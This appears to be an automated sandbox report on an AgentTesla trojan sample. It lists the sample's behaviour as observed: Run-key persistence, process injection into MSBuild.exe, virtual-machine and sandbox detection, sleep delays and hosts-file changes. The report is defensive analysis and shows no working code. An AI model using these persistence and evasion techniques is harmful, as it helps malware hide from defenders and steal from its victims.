                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeStatic PE information: 0xCED63224 [Mon Dec 18 16:53:56 2079 UTC]
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.97974117818
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ykVBUYJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ykVBUYJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe:Zone.Identifier read attributes | delete
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: 00000000.00000002.319389781.000000000355E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe PID: 6260, type: MEMORYSTR
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.319389781.000000000355E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.319389781.000000000355E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe TID: 6264Thread sleep time: -45733s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe TID: 6280Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3216Thread sleep time: -17524406870024063s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3380Thread sleep count: 6084 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3380Thread sleep count: 2290 > 30
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe TID: 3104Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe TID: 6304Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 6084
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 2290
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeThread delayed: delay time: 45733
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeThread delayed: delay time: 922337203685477
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                    Source: MSBuild.exe, 00000009.00000002.527123484.00000000012EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllnito
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067FC640 LdrInitializeThunk,
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 436000
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 464000
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D86008
                    .NET source code references suspicious native API functions
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/Shared/NativeMethodsShared.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('OpenProcess', 'OpenProcess@KERNEL32.DLL'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                    Source: 9.0.MSBuild.exe.400000.4.unpack, A/E1.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 9.0.MSBuild.exe.400000.1.unpack, A/E1.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 9.0.MSBuild.exe.400000.3.unpack, A/E1.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 9.0.MSBuild.exe.400000.2.unpack, A/E1.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 9.2.MSBuild.exe.400000.0.unpack, A/E1.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 9.0.MSBuild.exe.400000.0.unpack, A/E1.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 14.2.ykVBUY.exe.550000.0.unpack, Microsoft.Build/Shared/NativeMethodsShared.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('OpenProcess', 'OpenProcess@KERNEL32.DLL'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                    Source: 14.0.ykVBUY.exe.550000.0.unpack, Microsoft.Build/Shared/NativeMethodsShared.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('OpenProcess', 'OpenProcess@KERNEL32.DLL'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                    Modifies the hosts file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: MSBuild.exe, 00000009.00000002.529853749.0000000003202000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: MSBuild.exe, 00000009.00000002.529853749.0000000003202000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: program manager
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
